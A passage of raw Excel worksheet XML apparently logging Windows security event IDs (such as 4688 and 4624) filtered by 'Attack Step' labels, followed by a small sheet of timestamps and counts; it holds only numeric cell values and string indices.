      <c r="I5282">
        <v>4</v>
      </c>
      <c r="R5282" t="s">
        <v>6103</v>
      </c>
      <c r="T5282">
        <v>3</v>
      </c>
      <c r="U5282">
        <v>67027</v>
      </c>
      <c r="V5282" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5283" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5283">
        <v>5282</v>
      </c>
      <c r="B5283" t="s">
        <v>25</v>
      </c>
      <c r="C5283" t="s">
        <v>6104</v>
      </c>
      <c r="D5283">
        <v>15</v>
      </c>
      <c r="E5283" t="s">
        <v>37</v>
      </c>
      <c r="F5283" t="s">
        <v>38</v>
      </c>
      <c r="G5283" t="s">
        <v>50</v>
      </c>
      <c r="H5283">
        <v>4688</v>
      </c>
      <c r="I5283">
        <v>4</v>
      </c>
      <c r="R5283" t="s">
        <v>1527</v>
      </c>
      <c r="T5283">
        <v>3</v>
      </c>
      <c r="U5283">
        <v>67027</v>
      </c>
      <c r="V5283" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5284" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5284">
        <v>5283</v>
      </c>
      <c r="B5284" t="s">
        <v>25</v>
      </c>
      <c r="C5284" t="s">
        <v>6105</v>
      </c>
      <c r="D5284">
        <v>15</v>
      </c>
      <c r="E5284" t="s">
        <v>37</v>
      </c>
      <c r="F5284" t="s">
        <v>38</v>
      </c>
      <c r="G5284" t="s">
        <v>50</v>
      </c>
      <c r="H5284">
        <v>4688</v>
      </c>
      <c r="I5284">
        <v>4</v>
      </c>
      <c r="R5284" t="s">
        <v>1052</v>
      </c>
      <c r="T5284">
        <v>3</v>
      </c>
      <c r="U5284">
        <v>67027</v>
      </c>
      <c r="V5284" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5285" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5285">
        <v>5284</v>
      </c>
      <c r="B5285" t="s">
        <v>25</v>
      </c>
      <c r="C5285" t="s">
        <v>6106</v>
      </c>
      <c r="D5285">
        <v>15</v>
      </c>
      <c r="E5285" t="s">
        <v>37</v>
      </c>
      <c r="F5285" t="s">
        <v>38</v>
      </c>
      <c r="G5285" t="s">
        <v>50</v>
      </c>
      <c r="H5285">
        <v>4688</v>
      </c>
      <c r="I5285">
        <v>4</v>
      </c>
      <c r="R5285" t="s">
        <v>785</v>
      </c>
      <c r="T5285">
        <v>3</v>
      </c>
      <c r="U5285">
        <v>67027</v>
      </c>
      <c r="V5285" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5286" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5286">
        <v>5285</v>
      </c>
      <c r="B5286" t="s">
        <v>25</v>
      </c>
      <c r="C5286" t="s">
        <v>6107</v>
      </c>
      <c r="D5286">
        <v>15</v>
      </c>
      <c r="E5286" t="s">
        <v>37</v>
      </c>
      <c r="F5286" t="s">
        <v>38</v>
      </c>
      <c r="G5286" t="s">
        <v>50</v>
      </c>
      <c r="H5286">
        <v>4688</v>
      </c>
      <c r="I5286">
        <v>4</v>
      </c>
      <c r="R5286" t="s">
        <v>6108</v>
      </c>
      <c r="T5286">
        <v>3</v>
      </c>
      <c r="U5286">
        <v>67027</v>
      </c>
      <c r="V5286" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5287" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5287">
        <v>5286</v>
      </c>
      <c r="B5287" t="s">
        <v>25</v>
      </c>
      <c r="C5287" t="s">
        <v>6109</v>
      </c>
      <c r="D5287">
        <v>15</v>
      </c>
      <c r="E5287" t="s">
        <v>37</v>
      </c>
      <c r="F5287" t="s">
        <v>38</v>
      </c>
      <c r="G5287" t="s">
        <v>50</v>
      </c>
      <c r="H5287">
        <v>4688</v>
      </c>
      <c r="I5287">
        <v>4</v>
      </c>
      <c r="R5287" t="s">
        <v>6110</v>
      </c>
      <c r="T5287">
        <v>3</v>
      </c>
      <c r="U5287">
        <v>67027</v>
      </c>
      <c r="V5287" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5288" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5288">
        <v>5287</v>
      </c>
      <c r="B5288" t="s">
        <v>25</v>
      </c>
      <c r="C5288" t="s">
        <v>6111</v>
      </c>
      <c r="D5288">
        <v>15</v>
      </c>
      <c r="E5288" t="s">
        <v>37</v>
      </c>
      <c r="F5288" t="s">
        <v>38</v>
      </c>
      <c r="G5288" t="s">
        <v>50</v>
      </c>
      <c r="H5288">
        <v>4688</v>
      </c>
      <c r="I5288">
        <v>4</v>
      </c>
      <c r="R5288" t="s">
        <v>6112</v>
      </c>
      <c r="T5288">
        <v>3</v>
      </c>
      <c r="U5288">
        <v>67027</v>
      </c>
      <c r="V5288" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5289" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5289">
        <v>5288</v>
      </c>
      <c r="B5289" t="s">
        <v>25</v>
      </c>
      <c r="C5289" t="s">
        <v>6113</v>
      </c>
      <c r="D5289">
        <v>16</v>
      </c>
      <c r="E5289" t="s">
        <v>605</v>
      </c>
      <c r="F5289" t="s">
        <v>606</v>
      </c>
      <c r="G5289" t="s">
        <v>50</v>
      </c>
      <c r="H5289">
        <v>4673</v>
      </c>
      <c r="I5289">
        <v>4</v>
      </c>
      <c r="T5289">
        <v>4</v>
      </c>
      <c r="U5289">
        <v>60107</v>
      </c>
      <c r="V5289" t="s">
        <v>575</v>
      </c>
      <c r="W5289" t="s">
        <v>33</v>
      </c>
      <c r="X5289" t="s">
        <v>34</v>
      </c>
      <c r="Y5289" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5290" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5290">
        <v>5289</v>
      </c>
      <c r="B5290" t="s">
        <v>25</v>
      </c>
      <c r="C5290" t="s">
        <v>6113</v>
      </c>
      <c r="D5290">
        <v>16</v>
      </c>
      <c r="E5290" t="s">
        <v>605</v>
      </c>
      <c r="F5290" t="s">
        <v>606</v>
      </c>
      <c r="G5290" t="s">
        <v>50</v>
      </c>
      <c r="H5290">
        <v>4688</v>
      </c>
      <c r="I5290">
        <v>4</v>
      </c>
      <c r="R5290" t="s">
        <v>409</v>
      </c>
      <c r="T5290">
        <v>3</v>
      </c>
      <c r="U5290">
        <v>67027</v>
      </c>
      <c r="V5290" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5291" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5291">
        <v>5290</v>
      </c>
      <c r="B5291" t="s">
        <v>25</v>
      </c>
      <c r="C5291" t="s">
        <v>6114</v>
      </c>
      <c r="D5291">
        <v>16</v>
      </c>
      <c r="E5291" t="s">
        <v>605</v>
      </c>
      <c r="F5291" t="s">
        <v>606</v>
      </c>
      <c r="G5291" t="s">
        <v>50</v>
      </c>
      <c r="H5291">
        <v>4688</v>
      </c>
      <c r="I5291">
        <v>4</v>
      </c>
      <c r="R5291" t="s">
        <v>834</v>
      </c>
      <c r="T5291">
        <v>3</v>
      </c>
      <c r="U5291">
        <v>67027</v>
      </c>
      <c r="V5291" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5292" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5292">
        <v>5291</v>
      </c>
      <c r="B5292" t="s">
        <v>25</v>
      </c>
      <c r="C5292" t="s">
        <v>6115</v>
      </c>
      <c r="D5292">
        <v>16</v>
      </c>
      <c r="E5292" t="s">
        <v>605</v>
      </c>
      <c r="F5292" t="s">
        <v>606</v>
      </c>
      <c r="G5292" t="s">
        <v>50</v>
      </c>
      <c r="H5292">
        <v>4688</v>
      </c>
      <c r="I5292">
        <v>4</v>
      </c>
      <c r="R5292" t="s">
        <v>785</v>
      </c>
      <c r="T5292">
        <v>3</v>
      </c>
      <c r="U5292">
        <v>67027</v>
      </c>
      <c r="V5292" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5293" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5293">
        <v>5292</v>
      </c>
      <c r="B5293" t="s">
        <v>25</v>
      </c>
      <c r="C5293" t="s">
        <v>6116</v>
      </c>
      <c r="D5293">
        <v>16</v>
      </c>
      <c r="E5293" t="s">
        <v>605</v>
      </c>
      <c r="F5293" t="s">
        <v>606</v>
      </c>
      <c r="G5293" t="s">
        <v>50</v>
      </c>
      <c r="H5293">
        <v>4688</v>
      </c>
      <c r="I5293">
        <v>4</v>
      </c>
      <c r="R5293" t="s">
        <v>178</v>
      </c>
      <c r="T5293">
        <v>3</v>
      </c>
      <c r="U5293">
        <v>67027</v>
      </c>
      <c r="V5293" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5294" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5294">
        <v>5293</v>
      </c>
      <c r="B5294" t="s">
        <v>25</v>
      </c>
      <c r="C5294" t="s">
        <v>6117</v>
      </c>
      <c r="D5294">
        <v>15</v>
      </c>
      <c r="E5294" t="s">
        <v>37</v>
      </c>
      <c r="F5294" t="s">
        <v>38</v>
      </c>
      <c r="G5294" t="s">
        <v>50</v>
      </c>
      <c r="H5294">
        <v>4688</v>
      </c>
      <c r="I5294">
        <v>4</v>
      </c>
      <c r="R5294" t="s">
        <v>6118</v>
      </c>
      <c r="T5294">
        <v>3</v>
      </c>
      <c r="U5294">
        <v>67027</v>
      </c>
      <c r="V5294" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5295" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5295">
        <v>5294</v>
      </c>
      <c r="B5295" t="s">
        <v>25</v>
      </c>
      <c r="C5295" t="s">
        <v>6119</v>
      </c>
      <c r="D5295">
        <v>15</v>
      </c>
      <c r="E5295" t="s">
        <v>37</v>
      </c>
      <c r="F5295" t="s">
        <v>38</v>
      </c>
      <c r="G5295" t="s">
        <v>50</v>
      </c>
      <c r="H5295">
        <v>4688</v>
      </c>
      <c r="I5295">
        <v>4</v>
      </c>
      <c r="R5295" t="s">
        <v>6120</v>
      </c>
      <c r="T5295">
        <v>3</v>
      </c>
      <c r="U5295">
        <v>67027</v>
      </c>
      <c r="V5295" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5296" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5296">
        <v>5295</v>
      </c>
      <c r="B5296" t="s">
        <v>25</v>
      </c>
      <c r="C5296" t="s">
        <v>6121</v>
      </c>
      <c r="D5296">
        <v>15</v>
      </c>
      <c r="E5296" t="s">
        <v>37</v>
      </c>
      <c r="F5296" t="s">
        <v>38</v>
      </c>
      <c r="G5296" t="s">
        <v>50</v>
      </c>
      <c r="H5296">
        <v>4688</v>
      </c>
      <c r="I5296">
        <v>4</v>
      </c>
      <c r="R5296" t="s">
        <v>6122</v>
      </c>
      <c r="T5296">
        <v>3</v>
      </c>
      <c r="U5296">
        <v>67027</v>
      </c>
      <c r="V5296" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5297" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5297">
        <v>5296</v>
      </c>
      <c r="B5297" t="s">
        <v>25</v>
      </c>
      <c r="C5297" t="s">
        <v>6123</v>
      </c>
      <c r="D5297">
        <v>15</v>
      </c>
      <c r="E5297" t="s">
        <v>37</v>
      </c>
      <c r="F5297" t="s">
        <v>38</v>
      </c>
      <c r="G5297" t="s">
        <v>299</v>
      </c>
      <c r="H5297">
        <v>7040</v>
      </c>
      <c r="I5297">
        <v>844</v>
      </c>
      <c r="T5297">
        <v>3</v>
      </c>
      <c r="U5297">
        <v>61104</v>
      </c>
      <c r="V5297" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="5298" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5298">
        <v>5297</v>
      </c>
      <c r="B5298" t="s">
        <v>25</v>
      </c>
      <c r="C5298" t="s">
        <v>6124</v>
      </c>
      <c r="D5298">
        <v>16</v>
      </c>
      <c r="E5298" t="s">
        <v>605</v>
      </c>
      <c r="F5298" t="s">
        <v>606</v>
      </c>
      <c r="G5298" t="s">
        <v>262</v>
      </c>
      <c r="H5298">
        <v>16384</v>
      </c>
      <c r="I5298">
        <v>6212</v>
      </c>
      <c r="T5298">
        <v>3</v>
      </c>
      <c r="U5298">
        <v>60642</v>
      </c>
      <c r="V5298" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="5299" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5299">
        <v>5298</v>
      </c>
      <c r="B5299" t="s">
        <v>25</v>
      </c>
      <c r="C5299" t="s">
        <v>6125</v>
      </c>
      <c r="D5299">
        <v>15</v>
      </c>
      <c r="E5299" t="s">
        <v>37</v>
      </c>
      <c r="F5299" t="s">
        <v>38</v>
      </c>
      <c r="G5299" t="s">
        <v>50</v>
      </c>
      <c r="H5299">
        <v>4688</v>
      </c>
      <c r="I5299">
        <v>4</v>
      </c>
      <c r="R5299" t="s">
        <v>6126</v>
      </c>
      <c r="T5299">
        <v>3</v>
      </c>
      <c r="U5299">
        <v>67027</v>
      </c>
      <c r="V5299" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5300" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5300">
        <v>5299</v>
      </c>
      <c r="B5300" t="s">
        <v>25</v>
      </c>
      <c r="C5300" t="s">
        <v>6127</v>
      </c>
      <c r="D5300">
        <v>15</v>
      </c>
      <c r="E5300" t="s">
        <v>37</v>
      </c>
      <c r="F5300" t="s">
        <v>38</v>
      </c>
      <c r="G5300" t="s">
        <v>50</v>
      </c>
      <c r="H5300">
        <v>4688</v>
      </c>
      <c r="I5300">
        <v>4</v>
      </c>
      <c r="R5300" t="s">
        <v>6128</v>
      </c>
      <c r="T5300">
        <v>3</v>
      </c>
      <c r="U5300">
        <v>67027</v>
      </c>
      <c r="V5300" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5301" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5301">
        <v>5300</v>
      </c>
      <c r="B5301" t="s">
        <v>25</v>
      </c>
      <c r="C5301" t="s">
        <v>6129</v>
      </c>
      <c r="D5301">
        <v>15</v>
      </c>
      <c r="E5301" t="s">
        <v>37</v>
      </c>
      <c r="F5301" t="s">
        <v>38</v>
      </c>
      <c r="G5301" t="s">
        <v>50</v>
      </c>
      <c r="H5301">
        <v>4688</v>
      </c>
      <c r="I5301">
        <v>4</v>
      </c>
      <c r="R5301" t="s">
        <v>6130</v>
      </c>
      <c r="T5301">
        <v>3</v>
      </c>
      <c r="U5301">
        <v>67027</v>
      </c>
      <c r="V5301" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5302" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5302">
        <v>5301</v>
      </c>
      <c r="B5302" t="s">
        <v>25</v>
      </c>
      <c r="C5302" t="s">
        <v>6131</v>
      </c>
      <c r="D5302">
        <v>15</v>
      </c>
      <c r="E5302" t="s">
        <v>37</v>
      </c>
      <c r="F5302" t="s">
        <v>38</v>
      </c>
      <c r="G5302" t="s">
        <v>299</v>
      </c>
      <c r="H5302">
        <v>7040</v>
      </c>
      <c r="I5302">
        <v>844</v>
      </c>
      <c r="T5302">
        <v>3</v>
      </c>
      <c r="U5302">
        <v>61104</v>
      </c>
      <c r="V5302" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="5303" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5303">
        <v>5302</v>
      </c>
      <c r="B5303" t="s">
        <v>25</v>
      </c>
      <c r="C5303" t="s">
        <v>6132</v>
      </c>
      <c r="D5303">
        <v>15</v>
      </c>
      <c r="E5303" t="s">
        <v>37</v>
      </c>
      <c r="F5303" t="s">
        <v>38</v>
      </c>
      <c r="G5303" t="s">
        <v>50</v>
      </c>
      <c r="H5303">
        <v>4688</v>
      </c>
      <c r="I5303">
        <v>4</v>
      </c>
      <c r="R5303" t="s">
        <v>592</v>
      </c>
      <c r="T5303">
        <v>3</v>
      </c>
      <c r="U5303">
        <v>67027</v>
      </c>
      <c r="V5303" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5304" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5304">
        <v>5303</v>
      </c>
      <c r="B5304" t="s">
        <v>25</v>
      </c>
      <c r="C5304" t="s">
        <v>6133</v>
      </c>
      <c r="D5304">
        <v>15</v>
      </c>
      <c r="E5304" t="s">
        <v>37</v>
      </c>
      <c r="F5304" t="s">
        <v>38</v>
      </c>
      <c r="G5304" t="s">
        <v>50</v>
      </c>
      <c r="H5304">
        <v>4624</v>
      </c>
      <c r="I5304">
        <v>888</v>
      </c>
      <c r="K5304" t="s">
        <v>63</v>
      </c>
      <c r="L5304" t="s">
        <v>64</v>
      </c>
      <c r="T5304">
        <v>3</v>
      </c>
      <c r="U5304">
        <v>60106</v>
      </c>
      <c r="V5304" t="s">
        <v>65</v>
      </c>
      <c r="W5304" t="s">
        <v>33</v>
      </c>
      <c r="X5304" t="s">
        <v>34</v>
      </c>
      <c r="Y5304" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5305" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5305">
        <v>5304</v>
      </c>
      <c r="B5305" t="s">
        <v>25</v>
      </c>
      <c r="C5305" t="s">
        <v>6134</v>
      </c>
      <c r="D5305">
        <v>15</v>
      </c>
      <c r="E5305" t="s">
        <v>37</v>
      </c>
      <c r="F5305" t="s">
        <v>38</v>
      </c>
      <c r="G5305" t="s">
        <v>50</v>
      </c>
      <c r="H5305">
        <v>4688</v>
      </c>
      <c r="I5305">
        <v>4</v>
      </c>
      <c r="R5305" t="s">
        <v>985</v>
      </c>
      <c r="T5305">
        <v>3</v>
      </c>
      <c r="U5305">
        <v>67027</v>
      </c>
      <c r="V5305" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5306" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5306">
        <v>5305</v>
      </c>
      <c r="B5306" t="s">
        <v>25</v>
      </c>
      <c r="C5306" t="s">
        <v>6135</v>
      </c>
      <c r="D5306">
        <v>15</v>
      </c>
      <c r="E5306" t="s">
        <v>37</v>
      </c>
      <c r="F5306" t="s">
        <v>38</v>
      </c>
      <c r="G5306" t="s">
        <v>50</v>
      </c>
      <c r="H5306">
        <v>4673</v>
      </c>
      <c r="I5306">
        <v>4</v>
      </c>
      <c r="T5306">
        <v>4</v>
      </c>
      <c r="U5306">
        <v>60107</v>
      </c>
      <c r="V5306" t="s">
        <v>575</v>
      </c>
      <c r="W5306" t="s">
        <v>33</v>
      </c>
      <c r="X5306" t="s">
        <v>34</v>
      </c>
      <c r="Y5306" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5307" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5307">
        <v>5306</v>
      </c>
      <c r="B5307" t="s">
        <v>25</v>
      </c>
      <c r="C5307" t="s">
        <v>6136</v>
      </c>
      <c r="D5307">
        <v>15</v>
      </c>
      <c r="E5307" t="s">
        <v>37</v>
      </c>
      <c r="F5307" t="s">
        <v>38</v>
      </c>
      <c r="G5307" t="s">
        <v>50</v>
      </c>
      <c r="H5307">
        <v>4688</v>
      </c>
      <c r="I5307">
        <v>4</v>
      </c>
      <c r="R5307" t="s">
        <v>834</v>
      </c>
      <c r="T5307">
        <v>3</v>
      </c>
      <c r="U5307">
        <v>67027</v>
      </c>
      <c r="V5307" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5308" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5308">
        <v>5307</v>
      </c>
      <c r="B5308" t="s">
        <v>25</v>
      </c>
      <c r="C5308" t="s">
        <v>6137</v>
      </c>
      <c r="D5308">
        <v>15</v>
      </c>
      <c r="E5308" t="s">
        <v>37</v>
      </c>
      <c r="F5308" t="s">
        <v>38</v>
      </c>
      <c r="G5308" t="s">
        <v>50</v>
      </c>
      <c r="H5308">
        <v>4688</v>
      </c>
      <c r="I5308">
        <v>4</v>
      </c>
      <c r="R5308" t="s">
        <v>785</v>
      </c>
      <c r="T5308">
        <v>3</v>
      </c>
      <c r="U5308">
        <v>67027</v>
      </c>
      <c r="V5308" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5309" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5309">
        <v>5308</v>
      </c>
      <c r="B5309" t="s">
        <v>25</v>
      </c>
      <c r="C5309" t="s">
        <v>6138</v>
      </c>
      <c r="D5309">
        <v>15</v>
      </c>
      <c r="E5309" t="s">
        <v>37</v>
      </c>
      <c r="F5309" t="s">
        <v>38</v>
      </c>
      <c r="G5309" t="s">
        <v>50</v>
      </c>
      <c r="H5309">
        <v>4688</v>
      </c>
      <c r="I5309">
        <v>4</v>
      </c>
      <c r="R5309" t="s">
        <v>409</v>
      </c>
      <c r="T5309">
        <v>3</v>
      </c>
      <c r="U5309">
        <v>67027</v>
      </c>
      <c r="V5309" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5310" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5310">
        <v>5309</v>
      </c>
      <c r="B5310" t="s">
        <v>25</v>
      </c>
      <c r="C5310" t="s">
        <v>6139</v>
      </c>
      <c r="D5310">
        <v>15</v>
      </c>
      <c r="E5310" t="s">
        <v>37</v>
      </c>
      <c r="F5310" t="s">
        <v>38</v>
      </c>
      <c r="G5310" t="s">
        <v>50</v>
      </c>
      <c r="H5310">
        <v>4688</v>
      </c>
      <c r="I5310">
        <v>4</v>
      </c>
      <c r="R5310" t="s">
        <v>6140</v>
      </c>
      <c r="T5310">
        <v>3</v>
      </c>
      <c r="U5310">
        <v>67027</v>
      </c>
      <c r="V5310" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5311" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5311">
        <v>5310</v>
      </c>
      <c r="B5311" t="s">
        <v>25</v>
      </c>
      <c r="C5311" t="s">
        <v>6141</v>
      </c>
      <c r="D5311">
        <v>16</v>
      </c>
      <c r="E5311" t="s">
        <v>605</v>
      </c>
      <c r="F5311" t="s">
        <v>606</v>
      </c>
      <c r="G5311" t="s">
        <v>50</v>
      </c>
      <c r="H5311">
        <v>4673</v>
      </c>
      <c r="I5311">
        <v>4</v>
      </c>
      <c r="T5311">
        <v>4</v>
      </c>
      <c r="U5311">
        <v>60107</v>
      </c>
      <c r="V5311" t="s">
        <v>575</v>
      </c>
      <c r="W5311" t="s">
        <v>33</v>
      </c>
      <c r="X5311" t="s">
        <v>34</v>
      </c>
      <c r="Y5311" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5312" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5312">
        <v>5311</v>
      </c>
      <c r="B5312" t="s">
        <v>25</v>
      </c>
      <c r="C5312" t="s">
        <v>6142</v>
      </c>
      <c r="D5312">
        <v>16</v>
      </c>
      <c r="E5312" t="s">
        <v>605</v>
      </c>
      <c r="F5312" t="s">
        <v>606</v>
      </c>
      <c r="G5312" t="s">
        <v>50</v>
      </c>
      <c r="H5312">
        <v>4688</v>
      </c>
      <c r="I5312">
        <v>4</v>
      </c>
      <c r="R5312" t="s">
        <v>813</v>
      </c>
      <c r="T5312">
        <v>3</v>
      </c>
      <c r="U5312">
        <v>67027</v>
      </c>
      <c r="V5312" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5313" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5313">
        <v>5312</v>
      </c>
      <c r="B5313" t="s">
        <v>25</v>
      </c>
      <c r="C5313" t="s">
        <v>6143</v>
      </c>
      <c r="D5313">
        <v>16</v>
      </c>
      <c r="E5313" t="s">
        <v>605</v>
      </c>
      <c r="F5313" t="s">
        <v>606</v>
      </c>
      <c r="G5313" t="s">
        <v>50</v>
      </c>
      <c r="H5313">
        <v>4624</v>
      </c>
      <c r="I5313">
        <v>960</v>
      </c>
      <c r="K5313" t="s">
        <v>63</v>
      </c>
      <c r="L5313" t="s">
        <v>64</v>
      </c>
      <c r="T5313">
        <v>3</v>
      </c>
      <c r="U5313">
        <v>60106</v>
      </c>
      <c r="V5313" t="s">
        <v>65</v>
      </c>
      <c r="W5313" t="s">
        <v>33</v>
      </c>
      <c r="X5313" t="s">
        <v>34</v>
      </c>
      <c r="Y5313" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5314" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5314">
        <v>5313</v>
      </c>
      <c r="B5314" t="s">
        <v>25</v>
      </c>
      <c r="C5314" t="s">
        <v>6144</v>
      </c>
      <c r="D5314">
        <v>16</v>
      </c>
      <c r="E5314" t="s">
        <v>605</v>
      </c>
      <c r="F5314" t="s">
        <v>606</v>
      </c>
      <c r="G5314" t="s">
        <v>50</v>
      </c>
      <c r="H5314">
        <v>4688</v>
      </c>
      <c r="I5314">
        <v>4</v>
      </c>
      <c r="R5314" t="s">
        <v>69</v>
      </c>
      <c r="T5314">
        <v>3</v>
      </c>
      <c r="U5314">
        <v>67027</v>
      </c>
      <c r="V5314" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="5315" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A5315">
        <v>5314</v>
      </c>
      <c r="B5315" t="s">
        <v>25</v>
      </c>
      <c r="C5315" t="s">
        <v>6145</v>
      </c>
      <c r="D5315">
        <v>15</v>
      </c>
      <c r="E5315" t="s">
        <v>37</v>
      </c>
      <c r="F5315" t="s">
        <v>38</v>
      </c>
      <c r="G5315" t="s">
        <v>122</v>
      </c>
      <c r="H5315">
        <v>1150</v>
      </c>
      <c r="I5315">
        <v>3168</v>
      </c>
      <c r="T5315">
        <v>3</v>
      </c>
      <c r="U5315">
        <v>62128</v>
      </c>
      <c r="V5315" t="s">
        <v>4643</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:AA5315" xr:uid="{F7FF8BB6-8E71-49C6-9B3D-6B8C39E0640D}">
    <filterColumn colId="1">
      <filters>
        <filter val="Attack Step 1"/>
        <filter val="Attack Step 2"/>
        <filter val="Attack Step 3"/>
        <filter val="Attack Step 4"/>
        <filter val="Attack Step 5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62C7C-7230-4345-9898-5C69C5C7F449}">
  <dimension ref="A1:H6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="K5" sqref="K5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="2" width="18.54296875" customWidth="1"/>
    <col min="3" max="3" width="28.90625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="14.7265625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="1.81640625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="12.6328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="1.81640625" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="14.7265625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>6154</v>
      </c>
      <c r="B1" t="s">
        <v>6155</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>6148</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>6149</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>6150</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>6151</v>
      </c>
      <c r="G1" s="6" t="s">
        <v>6152</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>6153</v>
      </c>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A2" s="4">
        <v>0.62916666666666665</v>
      </c>
      <c r="B2" s="4">
        <v>0.64166666666666672</v>
      </c>
      <c r="C2" s="7">
        <v>45786.633333333331</v>
      </c>
      <c r="D2">
        <v>14</v>
      </c>
      <c r="F2">
        <v>14</v>
      </c>
      <c r="H2">
        <v>28</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A3" s="4">
        <v>0.64166666666666672</v>
      </c>
      <c r="B3" s="4">
        <v>0.66527777777777775</v>
      </c>
      <c r="C3" s="7">
        <v>45786.646527777775</v>
      </c>
      <c r="D3">
        <v>59</v>
      </c>
      <c r="F3">
        <v>59</v>
      </c>
      <c r="H3">
        <v>118</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A4" s="4">
        <v>0.66527777777777775</v>
      </c>
      <c r="B4" s="4">
        <v>0.67708333333333337</v>
      </c>
      <c r="C4" s="7">
        <v>45786.677083333336</v>
      </c>
      <c r="D4">
        <v>6</v>
      </c>
      <c r="F4">
        <v>6</v>
      </c>
      <c r="H4">
        <v>12</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A5" s="4">
        <v>0.67708333333333337</v>
      </c>
      <c r="B5" s="4">
        <v>0.7006944444444444</v>
      </c>
      <c r="C5" s="7">
        <v>45786.677777777775</v>
      </c>
      <c r="D5">
        <v>63</v>
      </c>
      <c r="F5">
        <v>63</v>
      </c>
      <c r="H5">
        <f>126</f>
        <v>126</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A6" s="4">
        <v>0.7006944444444444</v>
      </c>
      <c r="B6" s="4">
        <v>0.71527777777777779</v>
      </c>
      <c r="C6" s="7">
        <v>45786.701388888891</v>
      </c>
